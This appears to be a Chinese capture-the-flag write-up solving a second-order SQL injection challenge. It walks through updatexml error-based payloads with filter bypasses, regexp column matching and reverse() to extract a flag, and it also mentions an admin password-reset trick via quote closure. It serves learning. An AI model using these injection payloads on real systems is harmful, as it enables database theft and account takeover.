第一眼没看出来 我以为是伪造管理员
就先去测试管理员账号
去register.php
注册 首先先注册一个自己的账号
我喜欢用admin123
发现里面存在修改密码的内容 那么肯定链接到数据库了
题目又提示是sql
那我们看看能不能修改管理员密码
首先我们猜测闭合
通过用户名
admin"
然后点击修改密码 进行修改密码
发现报错了
这里我们就可以先进行判断sql语句了
select * from users where username="admin"" and pwd='21232f297a57a5a743894a0e4a801fc3
那我们这里就很简单了 因为修改成功没有回显 报错有回显
我们直接报错注入即可
admin"or(updatexml(1,0x7e,4))#
发现报错了 肯定存在过滤
那我们fuzz一下
and 和 空格被过滤
绕过即可
admin"or(updatexml(1,0x7e,4))#
报错成功
我们开始注入
admin"or(updatexml(1,concat(0x7e,database()),3))#数据库为 web_sqliadmin"or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="web_sqli"))),4))#爆出表名为 article,flag,usersadmin"or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users"))),4))#
这里就有一个坑
报错出来是错的。。。。 应该是here
晕咯 学习一下函数
regexp
regexp('^r')
这个函数可以通过正则来匹配字段 这里就是 r开头的字段
admin"or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")&&(column_name)regexp('^r'))),4))#
接着写
admin"or(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users))),4))#
flag开头 那我们直接查f开头即可
admin"or(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),4))#
还有一半无法读取 并且无法使用
看了wp 使用逆序输出 然后使用脚本恢复即可
reverse
admin"or(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),4))#
flag='}0e330032cd22-f828-d154-53d8-6e'
flag=flag[::-1]
print(flag)
拼接即可得出flag
其他
提一嘴 我们只要知道了闭合就可以修改管理员密码了
admin"#
然后修改 密码 就可以登入 admin账号了 但是这道题没有用就是了